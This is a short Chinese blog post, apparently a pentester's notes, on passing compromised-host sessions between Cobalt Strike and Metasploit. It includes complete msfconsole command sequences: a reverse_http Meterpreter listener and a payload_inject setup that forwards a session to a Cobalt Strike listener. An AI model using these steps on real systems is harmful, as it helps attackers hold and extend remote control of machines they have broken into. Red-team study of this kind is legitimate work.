Cobaltstrike与MSF会话派生
Cobaltstrike与MSF会话派生
一般在渗透的过程中,Get到shell之后一般来说我喜欢上线到Cobaltstrike,但是Cobaltstrike的会话是60S更新一次,有时候功能也并没有MSF完善,那么今天记录一下如何实现Cobaltstrike与MSF的联动。
Cobaltstrike派生会话
1.msf创建监听
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http payload => windows/meterpreter/reverse_http msf6 exploit(multi/handler) > set lhost 192.168.37.134 lhost => 192.168.37.134 msf6 exploit(multi/handler) > set lport 8088 lport => 8088 msf6 exploit(multi/handler) > run -j
2.cs新建一个监听器,地址为msf地址,端口为msf的监听端口
3.在 cs的现有会话上增加会话
4.选择刚刚建立的监听器
此时msf中就会出现session
Metasploit派生会话
如果Metasploit已经获取到了一个会话,可以通过payload_inject模块进行会话派生,将会话传递到Cobaltstrike。
1.首先在cs中开启监听
2.msf配置。
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true set lhost x.x.x.x #cobaltstrike监听的ip set lport 6789 #cobaltstrike监听的端口 set session 1 #这里是获得的session的id exploit
3.返回CS查看反弹成功。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
· 没有源码,如何修改代码逻辑?
· 分享4款.NET开源、免费、实用的商城系统
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了